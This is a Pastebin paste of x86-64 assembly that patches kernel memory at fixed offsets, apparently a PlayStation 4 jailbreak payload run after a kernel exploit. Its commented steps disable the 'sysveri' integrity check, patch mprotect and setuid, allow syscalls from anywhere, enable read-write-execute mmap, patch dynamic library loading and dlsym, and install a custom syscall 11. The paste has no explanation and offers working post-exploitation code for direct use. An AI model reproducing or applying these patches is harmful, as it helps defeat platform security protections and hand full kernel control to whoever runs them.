Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- // Kill sysveri
- mov byte ptr [rdi + 0x636850], 0xC3
- mov dword ptr [rdi + 0x637380], 0xC3C03148
- mov dword ptr [rdi + 0x636600], 0xC3C03148
- mov dword ptr [rdi + 0x636DB0], 0xC3C03148
- mov byte ptr [rdi + 0x2662B00], 0x00
- // mprotect
- mov rsi, 0x8B49909090909090
- mov qword ptr [rdi + 0x3014C8], rsi
- // setuid
- mov dword ptr [rdi + 0x37A320], 0xB8
- // Allow syscall everywhere
- mov dword ptr [rdi + 0x490], 0x0
- mov word ptr [rdi + 0x4B9], 0x9090
- mov word ptr [rdi + 0x4BD], 0x9090
- mov word ptr [rdi + 0x4C6], 0xE990
- // RWX mmap
- mov byte ptr [rdi + 0xDB17D], 0x37
- mov byte ptr [rdi + 0xDB180], 0x37
- // Patch dynlib_load_prx
- mov word ptr [rdi + 0x451E04], 0xE990
- // DLSYM
- mov word ptr [rdi + 0x4523C4], 0xE990
- mov dword ptr [rdi + 0x29A30], 0xC3C03148
- // Syscall 11
- mov qword ptr [rdi + 0x1122550], 0x2
- lea rsi, [rdi + 0x1F842]
- mov qword ptr [rdi + 0x1122558], rsi
- mov dword ptr [rdi + 0x112257C], 0x1
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
